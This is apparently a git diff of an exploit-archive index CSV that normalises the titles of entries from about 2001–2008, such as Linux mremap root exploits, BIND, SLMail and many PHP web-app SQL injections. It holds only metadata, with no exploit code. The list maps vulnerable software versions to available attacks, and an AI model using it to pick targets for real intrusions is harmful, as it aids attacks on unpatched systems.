diff --git a/files.csv b/files.csv index 12ba444d1..765b7593f 100755 --- a/files.csv +++ b/files.csv @@ -134,11 +134,11 @@ id,file,description,date,author,platform,type,port 138,platforms/php/webapps/138.pl,"PHP-NUKE version <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406 140,platforms/linux/local/140.c,"Xsok 1.02 - ""-xsokdir"" Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 -141,platforms/linux/local/141.c,"Linux Kernel ""do_mremap"" Local Proof of Concept",2004-01-06,"Christophe Devine",linux,local,0 -142,platforms/linux/local/142.c,"Linux Kernel ""do_mremap"" Local Proof of Concept II",2004-01-07,"Christophe Devine",linux,local,0 +141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23, <= 2.6.0 - ""do_mremap"" Local Proof of Concept",2004-01-06,"Christophe Devine",linux,local,0 +142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23, <= 2.6.0 - ""do_mremap"" Local Proof of Concept (2)",2004-01-07,"Christophe Devine",linux,local,0 143,platforms/linux/remote/143.c,"lftp <= 2.6.9 - Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0 144,platforms/linux/local/144.c,"SuSE linux 9.0 YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0 -145,platforms/linux/local/145.c,"Linux Kernel 2.4.x mremap() bound checking Root Exploit",2004-01-15,"Paul Starzetz",linux,local,0 +145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23, <= 2.6.0 - mremap() Bound Checking Root Exploit",2004-01-15,"Paul Starzetz",linux,local,0 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0 147,platforms/windows/dos/147.c,"Need for Speed 2 Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0 148,platforms/windows/dos/148.sh,"MS Windows XP/2003 Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0 @@ -146,13 +146,13 @@ id,file,description,date,author,platform,type,port 151,platforms/windows/remote/151.txt,"MS Internet Explorer URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0 152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local stack overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0 153,platforms/windows/dos/153.c,"MS Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 -154,platforms/linux/local/154.c,"Linux Kernel ""mremap()""#2 Local Proof-of-concept",2004-02-18,"Christophe Devine",linux,local,0 +154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25, <= 2.4.24, <= 2.6.2 - ""mremap()"" Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0 155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128 156,platforms/windows/remote/156.c,"PSOProxy 0.91 Remote Buffer Overflow Exploit (Win2k/XP)",2004-02-26,Rave,windows,remote,8080 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389 158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21 159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21 -160,platforms/linux/local/160.c,"Linux Kernel 2.x mremap missing do_munmap Exploit",2004-03-01,"Paul Starzetz",linux,local,0 +160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25, <= 2.4.24, <= 2.6.2 - ""mremap()"" Missing ""do_munmap"" Exploit",2004-03-01,"Paul Starzetz",linux,local,0 161,platforms/windows/dos/161.c,"Red Faction <= 1.20 Server Reply Remote Buffer Overflow Exploit",2004-03-04,"Luigi Auriemma",windows,dos,0 163,platforms/windows/remote/163.pl,"Eudora 6.0.3 Attachment Spoofing Exploit (windows)",2004-03-19,N/A,windows,remote,0 164,platforms/windows/remote/164.c,"Foxmail 5.0 PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0 @@ -251,7 +251,7 @@ id,file,description,date,author,platform,type,port 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service Exploit",2001-05-07,honoriak,novell,dos,0 265,platforms/irix/local/265.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/bin/lpstat Local Exploit",2001-05-07,LSD-PLaNET,irix,local,0 266,platforms/windows/remote/266.c,"MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit",2001-05-07,"Ryan Permeh",windows,remote,80 -268,platforms/windows/remote/268.c,"MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (2)",2001-05-08,"dark spyrit",windows,remote,80 +268,platforms/windows/remote/268.c,"MS Windows 2000 sp1/sp2 isapi - .printer Extension Overflow Exploit (2)",2001-05-08,"dark spyrit",windows,remote,80 269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) - Remote Root Exploit (Linux x86)",2001-05-08,qitest1,linux,remote,21 270,platforms/irix/local/270.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0 271,platforms/windows/local/271.c,"MS Windows Utility Manager Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 @@ -261,7 +261,7 @@ id,file,description,date,author,platform,type,port 275,platforms/windows/remote/275.c,"MS Windows IIS 5.0 SSL Remote buffer overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443 276,platforms/windows/dos/276.delphi,"MS Windows 2K/XP TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0 277,platforms/linux/remote/277.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit",2001-03-01,Gneisenau,linux,remote,53 -279,platforms/linux/remote/279.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (2)",2001-03-01,LSD-PLaNET,linux,remote,53 +279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit (2)",2001-03-01,LSD-PLaNET,linux,remote,53 280,platforms/solaris/remote/280.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (3)",2001-03-01,LSD-PLaNET,solaris,remote,53 281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g /usr/bin/at Local Root Exploit",2001-03-02,"Cody Tubbs",tru64,local,0 282,platforms/linux/remote/282.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (4)",2001-03-02,multiple,linux,remote,53 @@ -371,7 +371,7 @@ id,file,description,date,author,platform,type,port 397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) Remote Exploit",2002-06-25,Teso,linux,remote,143 398,platforms/linux/remote/398.c,"rsync <= 2.5.1 - Remote Exploit",2002-01-01,Teso,linux,remote,873 399,platforms/linux/remote/399.c,"rsync <= 2.5.1 - Remote Exploit (2)",2002-01-01,Teso,linux,remote,873 -400,platforms/linux/remote/400.c,"GV PostScript Viewer Remote Buffer overflow Exploit (2)",2004-08-18,infamous41md,linux,remote,0 +400,platforms/linux/remote/400.c,"GV PostScript Viewer - Remote Buffer overflow Exploit (2)",2004-08-18,infamous41md,linux,remote,0 401,platforms/windows/local/401.c,"IPSwitch IMail Server <= 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0 403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) Local Exploit",2004-08-18,N/A,windows,local,0 404,platforms/linux/remote/404.pl,"PlaySMS <= 0.7 - SQL Injection Exploit",2004-08-19,"Noam Rathaus",linux,remote,0 @@ -489,11 +489,11 @@ id,file,description,date,author,platform,type,port 635,platforms/php/webapps/635.txt,"miniBB - Input Validation Hole ('user')",2004-11-16,N/A,php,webapps,0 636,platforms/windows/remote/636.c,"MiniShare Remote Buffer Overflow Exploit (c source)",2004-11-16,NoPh0BiA,windows,remote,80 637,platforms/windows/remote/637.c,"MailCarrier 2.51 Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25 -638,platforms/windows/remote/638.py,"SLMail 5.5 POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110 +638,platforms/windows/remote/638.py,"SLMail 5.5 - POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110 640,platforms/windows/remote/640.c,"MS Windows Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0 641,platforms/windows/remote/641.txt,"MS Internet Explorer 6.0 SP2 File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0 642,platforms/cgi/webapps/642.pl,"TWiki 20030201 search.pm Remote Command Execution Exploit",2004-11-20,RoMaNSoFt,cgi,webapps,0 -643,platforms/windows/remote/643.c,"SLMAIL 5.5 POP3 PASS - Remote Buffer Overflow Exploit",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 +643,platforms/windows/remote/643.c,"SLMail 5.5 - POP3 PASS Remote Buffer Overflow Exploit",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 644,platforms/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Buffer Overflow Exploit",2004-11-21,"Reed Arvin",windows,remote,110 645,platforms/php/webapps/645.pl,"GFHost PHP GMail Remote Command Execution Exploit",2004-11-21,spabam,php,webapps,0 646,platforms/windows/remote/646.c,"SLMail 5.5 - Remote Buffer Overflow Exploit",2004-12-22,"Ivan Ivanovic",windows,remote,0 @@ -553,7 +553,7 @@ id,file,description,date,author,platform,type,port 711,platforms/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow Exploit",2005-04-24,cybertronic,windows,remote,21 712,platforms/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 Format String Remote Exploit",2004-12-23,pucik,linux,remote,8000 713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp Local Buffer Overflow Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0 -714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp Local Buffer Overflow Exploit (2)",2004-12-24,"Marco Ivaldi",solaris,local,0 +714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow Exploit (2)",2004-12-24,"Marco Ivaldi",solaris,local,0 715,platforms/solaris/local/715.c,"Solaris 8/9 passwd circ() Local Root Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0 716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC)",2004-12-24,"Marco Ivaldi",solaris,remote,513 718,platforms/linux/local/718.c,"Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit",2004-12-24,"Marco Ivaldi",linux,local,0 @@ -725,7 +725,7 @@ id,file,description,date,author,platform,type,port 903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit",2005-03-29,crash-x,linux,remote,143 904,platforms/linux/dos/904.c,"Linux Kernel <= 2.6.10 Local Denial of Service Exploit",2005-03-29,ChoiX,linux,dos,0 905,platforms/windows/local/905.c,"BakBone NetVault 6.x/7.x Local Stack Buffer Overflow Exploit",2005-04-01,class101,windows,local,0 -906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow Exploit (2)",2005-04-01,class101,windows,remote,20031 +906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x- Remote Heap Buffer Overflow Exploit (2)",2005-04-01,class101,windows,remote,20031 907,platforms/php/webapps/907.pl,"phpBB <= 2.0.13 'downloads.php' mod Remote Exploit",2005-04-02,CereBrums,php,webapps,0 908,platforms/windows/dos/908.c,"ArGoSoft FTP Server <= 1.4.2.8 - Denial of Service Exploit",2005-04-03,c0d3r,windows,dos,0 909,platforms/windows/remote/909.cpp,"MS Windows (WINS) Remote Buffer Overflow Exploit (v.3)",2005-04-12,class101,windows,remote,42 @@ -849,7 +849,7 @@ id,file,description,date,author,platform,type,port 1037,platforms/multiple/dos/1037.c,"Tcpdump bgp_update_print Remote Denial of Service Exploit",2005-06-09,simon,multiple,dos,0 1038,platforms/linux/remote/1038.c,"GNU Mailutils imap4d 0.5 < 0.6.90 Remote Format String Exploit",2005-06-10,qobaiashi,linux,remote,143 1039,platforms/cgi/webapps/1039.pl,"Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0 -1040,platforms/cgi/webapps/1040.c,"Webhints <= 1.03 Remote Command Execution Exploit (c code) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0 +1040,platforms/cgi/webapps/1040.c,"Webhints <= 1.03 - Remote Command Execution Exploit (c code) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0 1041,platforms/cgi/webapps/1041.pl,"Webhints <= 1.03 Remote Command Execution Exploit (perl code) (3)",2005-06-11,MadSheep,cgi,webapps,0 1043,platforms/osx/local/1043.c,"Mac OS X 10.4 launchd Race Condition Exploit",2005-06-14,intropy,osx,local,0 1044,platforms/aix/local/1044.c,"AIX 5.2 netpmon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 @@ -881,7 +881,7 @@ id,file,description,date,author,platform,type,port 1071,platforms/asp/webapps/1071.pl,"ASPNuke <= 0.80 (comment_post.asp) SQL Injection Exploit",2005-06-27,"Alberto Trivero",asp,webapps,0 1072,platforms/multiple/dos/1072.cpp,"Stream / Raped Denial of Service Attack (win version)",2005-06-27,"Marco Del Percio",multiple,dos,0 1073,platforms/solaris/local/1073.c,"Solaris 9 / 10 ld.so Local Root Exploit (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 -1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 ld.so Local Root Exploit (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 +1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Local Root Exploit (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1075,platforms/windows/remote/1075.c,"MS Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 1077,platforms/php/webapps/1077.pl,"Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit",2005-06-30,"James Bercegay",php,webapps,0 @@ -998,7 +998,7 @@ id,file,description,date,author,platform,type,port 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker <= 7.7r3 Denial of Service Exploit",2005-09-06,Sowhat,windows,dos,0 1200,platforms/php/webapps/1200.php,"PBLang <= 4.65 Remote Command Execution Exploit",2005-09-07,rgod,php,webapps,0 1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager <= 1.2 Command Execution Exploit",2005-09-07,basher13,windows,remote,0 -1202,platforms/php/webapps/1202.php,"PBLang <= 4.65 Remote Command Execution Exploit (2)",2005-09-07,RusH,php,webapps,0 +1202,platforms/php/webapps/1202.php,"PBLang <= 4.65 - Remote Command Execution Exploit (2)",2005-09-07,RusH,php,webapps,0 1204,platforms/multiple/dos/1204.html,"Mozilla Products (Host:) Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos,0 1207,platforms/php/webapps/1207.php,"Class-1 Forum <= 0.24.4 - Remote Code Execution Exploit",2005-09-09,rgod,php,webapps,0 1208,platforms/php/webapps/1208.pl,"phpMyFamily <= 1.4.0 - SQL Injection Exploit",2005-03-27,basher13,php,webapps,0 @@ -1045,7 +1045,7 @@ id,file,description,date,author,platform,type,port 1252,platforms/asp/webapps/1252.htm,"MuOnline Loopholes Web Server (pkok.asp) SQL Injection Exploit",2005-10-15,nukedx,asp,webapps,0 1253,platforms/multiple/dos/1253.html,"Mozilla (Firefox <= 1.0.7) (Thunderbird <= 1.0.6) Denial of Service Exploit",2005-10-16,posidron,multiple,dos,0 1254,platforms/multiple/dos/1254.html,"Opera <= 8.02 Remote Denial of Service Exploit",2005-10-16,posidron,multiple,dos,0 -1255,platforms/windows/dos/1255.html,"Opera <= 8.02 Remote Denial of Service Exploit (2)",2005-10-16,posidron,windows,dos,0 +1255,platforms/windows/dos/1255.html,"Opera <= 8.02 - Remote Denial of Service Exploit (2)",2005-10-16,posidron,windows,dos,0 1256,platforms/multiple/dos/1256.pl,"Lynx <= 2.8.6dev.13 Remote Buffer Overflow Exploit (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos,0 1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit",2005-10-17,Kubbo,multiple,dos,0 1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) Remote SQL Injection Exploit",2005-10-18,rgod,linux,remote,0 @@ -1939,7 +1939,7 @@ id,file,description,date,author,platform,type,port 2243,platforms/php/webapps/2243.php,"Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0 2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox <= 1.5.0.6 (FTP Request) Remote Denial of Service Exploit",2006-08-22,"Tomas Kempinsky",multiple,dos,0 2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC",2006-08-22,"Leon Juranic",windows,dos,0 -2246,platforms/hardware/dos/2246.cpp,"2wire Modems/Routers CRLF Denial of Service Exploit",2006-08-22,preth00nker,hardware,dos,0 +2246,platforms/hardware/dos/2246.cpp,"2wire Modems/Routers CRLF - Denial of Service Exploit",2006-08-22,preth00nker,hardware,dos,0 2247,platforms/php/webapps/2247.php,"MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit",2006-08-23,rgod,php,webapps,0 2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod <= 1.5.0 (start) Remote SQL Injection Exploit",2006-08-23,SpiderZ,php,webapps,0 2249,platforms/php/webapps/2249.txt,"pSlash 0.7 (lvc_include_dir) Remote File Include Vulnerability",2006-08-23,"Mehmet Ince",php,webapps,0 @@ -3072,7 +3072,7 @@ id,file,description,date,author,platform,type,port 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability",2007-03-04,"Stefan Esser",multiple,remote,0 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 (eintrag.php sqllog) Remote File Include Exploit",2007-03-04,bd0rk,php,webapps,0 3407,platforms/multiple/dos/3407.c,"Asterisk <= 1.2.15 / 1.4.0 pre-auth Remote Denial of Service Exploit",2007-03-04,fbffff,multiple,dos,0 -3408,platforms/php/webapps/3408.pl,"AJ Auction Pro All Versions (subcat.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 +3408,platforms/php/webapps/3408.pl,"AJ Auction Pro All Versions - (subcat.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 (view_profile.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 (postingdetails.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 (topic_title.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 @@ -4203,7 +4203,7 @@ id,file,description,date,author,platform,type,port 4557,platforms/php/webapps/4557.txt,"Simple PHP Blog (sphpblog) <= 0.5.1 - Multiple Vulnerabilities",2007-10-22,DarkFig,php,webapps,0 4558,platforms/php/webapps/4558.txt,"InstaGuide Weather Script (index.php) 1.0 - Local File Inclusion Vulnerability",2007-10-22,"BorN To K!LL",php,webapps,0 4559,platforms/multiple/dos/4559.txt,"Mozilla Firefox <= 2.0.0.7 - Remote Denial of Service Exploit",2007-10-22,BugReport.IR,multiple,dos,0 -4560,platforms/multiple/dos/4560.pl,"DNS Recursion bandwidth amplification Denial of Service PoC",2007-10-23,ShadowHatesYou,multiple,dos,0 +4560,platforms/multiple/dos/4560.pl,"DNS Recursion Bandwidth Amplification - Denial of Service PoC",2007-10-23,ShadowHatesYou,multiple,dos,0 4561,platforms/php/webapps/4561.txt,"Flatnuke 3 Remote Command Execution / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 4562,platforms/php/webapps/4562.txt,"Flatnuke 3 Remote Cookie Manipoulation / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 4563,platforms/php/webapps/4563.txt,"php-nuke platinum 7.6.b.5 - Remote File Inclusion Vulnerability",2007-10-23,BiNgZa,php,webapps,0 @@ -4479,7 +4479,7 @@ id,file,description,date,author,platform,type,port 4836,platforms/php/webapps/4836.txt,"samPHPweb (songinfo.php) Remote SQL Injection Vulnerability",2008-01-05,BackDoor,php,webapps,0 4837,platforms/php/webapps/4837.pl,"ClipShare 2.6 - Remote User Password Change Exploit",2008-01-05,Pr0metheuS,php,webapps,0 4838,platforms/php/webapps/4838.txt,"snetworks php classifieds 5.0 - Remote File Inclusion Vulnerability",2008-01-05,Crackers_Child,php,webapps,0 -4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 .m3u Playlist Stack Overflow Exploit",2008-01-05,Trancek,windows,local,0 +4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - .m3u Playlist Stack Overflow Exploit",2008-01-05,Trancek,windows,local,0 4840,platforms/php/webapps/4840.php,"Tribisur <= 2.0 - Remote SQL Injection Exploit",2008-01-05,x0kster,php,webapps,0 4841,platforms/php/webapps/4841.txt,"Invision Power Board <= 2.1.7 ACTIVE XSS/SQL Injection Exploit",2008-01-05,"Eugene Minaev",php,webapps,0 4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0 @@ -5215,7 +5215,7 @@ id,file,description,date,author,platform,type,port 5588,platforms/php/webapps/5588.php,"QuickUpCMS Multiple Remote SQL Injection Vulnerabilities Exploit",2008-05-11,Lidloses_Auge,php,webapps,0 5589,platforms/php/webapps/5589.php,"Vortex CMS (index.php pageid) Blind SQL Injection Exploit",2008-05-11,Lidloses_Auge,php,webapps,0 5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 (featured_article.php) Remote SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0 -5591,platforms/php/webapps/5591.txt,"AJ Auction <= 6.2.1 (classifide_ad.php) SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0 +5591,platforms/php/webapps/5591.txt,"AJ Auction <= 6.2.1 - (classifide_ad.php) SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0 5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 (index.php) Remote SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0 5594,platforms/php/webapps/5594.txt,"ZeusCart <= 2.0 (category_list.php) SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0 5595,platforms/php/webapps/5595.txt,"clanlite 2.x (SQL Injection/xss) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0 @@ -5486,7 +5486,7 @@ id,file,description,date,author,platform,type,port 5864,platforms/php/webapps/5864.txt,"Orlando CMS 0.6 - Remote File Inclusion Vulnerabilities",2008-06-19,Ciph3r,php,webapps,0 5865,platforms/php/webapps/5865.txt,"CaupoShop Classic 1.3 (saArticle[ID]) Remote SQL Injection Vulnerability",2008-06-19,N/A,php,webapps,0 5866,platforms/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 - Remote File Inclusion Vulnerabilities",2008-06-19,Ciph3r,php,webapps,0 -5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 (cate_id) SQL Injection Vulnerability",2008-06-19,"Hussin X",php,webapps,0 +5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - (cate_id) SQL Injection Vulnerability",2008-06-19,"Hussin X",php,webapps,0 5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - (id) Remote SQL Injection Vulnerability",2008-06-19,"Hussin X",php,webapps,0 5869,platforms/php/webapps/5869.txt,"virtual support office-xp <= 3.0.29 Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 5870,platforms/php/webapps/5870.txt,"gl-sh deaf forum <= 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 @@ -5768,7 +5768,7 @@ id,file,description,date,author,platform,type,port 6154,platforms/php/webapps/6154.txt,"ViArt Shop <= 3.5 (category_id) Remote SQL Injection Vulnerability",2008-07-28,"GulfTech Security",php,webapps,0 6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb)",2008-07-29,"Andy Davis",hardware,remote,0 6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 (lang) Local File Inclusion Vulnerability",2008-07-29,DSecRG,php,webapps,0 -6157,platforms/windows/local/6157.pl,"CoolPlayer m3u File Local Buffer Overflow Exploit",2008-07-29,"Guido Landi",windows,local,0 +6157,platforms/windows/local/6157.pl,"CoolPlayer - m3u File Local Buffer Overflow Exploit",2008-07-29,"Guido Landi",windows,local,0 6158,platforms/php/webapps/6158.pl,"e107 Plugin BLOG Engine 2.2 - Blind SQL Injection Exploit",2008-07-29,"Virangar Security",php,webapps,0 6159,platforms/php/webapps/6159.txt,"Gregarius <= 0.5.4 rsargs[] Remote SQL Injection Vulnerability",2008-07-29,"GulfTech Security",php,webapps,0 6160,platforms/php/webapps/6160.txt,"PHP Hosting Directory 2.0 (admin.php rd) RFI Vulnerability",2008-07-29,RoMaNcYxHaCkEr,php,webapps,0 @@ -6120,7 +6120,7 @@ id,file,description,date,author,platform,type,port 6547,platforms/php/webapps/6547.txt,"Ol Bookmarks Manager 0.7.5 RFI / LFI / SQL Injection Vulnerabilities",2008-09-24,GoLd_M,php,webapps,0 6548,platforms/windows/remote/6548.html,"BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution",2008-09-24,shinnai,windows,remote,0 6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple Remote SQL Injection Vulnerabilities",2008-09-24,ZoRLu,php,webapps,0 -6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin #2 (detail.php item_id) SQL Injection Vuln",2008-09-24,GoLd_M,php,webapps,0 +6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - (detail.php item_id) SQL Injection Vuln",2008-09-24,GoLd_M,php,webapps,0 6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 (sitecode) Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0 6552,platforms/php/webapps/6552.txt,"mailwatch <= 1.0.4 (docs.php doc) Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0 6553,platforms/php/webapps/6553.txt,"PHPcounter <= 1.3.2 (defs.php l) Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0 @@ -6131,7 +6131,7 @@ id,file,description,date,author,platform,type,port 6558,platforms/php/webapps/6558.txt,"barcodegen <= 2.0.0 - Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0 6560,platforms/windows/dos/6560.txt,"MS Windows Wordpad .doc File Local Denial of Service PoC",2008-09-25,securfrog,windows,dos,0 -6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum (seller_id) SQL Injection Vulnerability",2008-09-25,InjEctOr5,php,webapps,0 +6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - (seller_id) SQL Injection Vulnerability",2008-09-25,InjEctOr5,php,webapps,0 6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 (design) Local File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0 6563,platforms/php/webapps/6563.txt,"phpOCS <= 0.1-beta3 (index.php act) Local File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0 6564,platforms/php/webapps/6564.txt,"Vikingboard <= 0.2 Beta (task) Local File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0 @@ -6188,7 +6188,7 @@ id,file,description,date,author,platform,type,port 6616,platforms/windows/dos/6616.txt,"MS Windows Explorer Unspecified .ZIP File Denial of Service Exploit",2008-09-28,"fl0 fl0w",windows,dos,0 6617,platforms/php/webapps/6617.txt,"BbZL.PhP 0.92 (lien_2) Local Directory Traversal Vulnerability",2008-09-28,JIKO,php,webapps,0 6618,platforms/php/webapps/6618.txt,"joomla component imagebrowser <= 0.1.5 rc2 - Directory Traversal vuln",2008-09-28,Cr@zy_King,php,webapps,0 -6619,platforms/windows/dos/6619.html,"MS Internet Explorer GDI+ Proof of Concept (MS08-052)",2008-09-28,"John Smith",windows,dos,0 +6619,platforms/windows/dos/6619.html,"MS Internet Explorer GDI+ - Proof of Concept (MS08-052)",2008-09-28,"John Smith",windows,dos,0 6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection 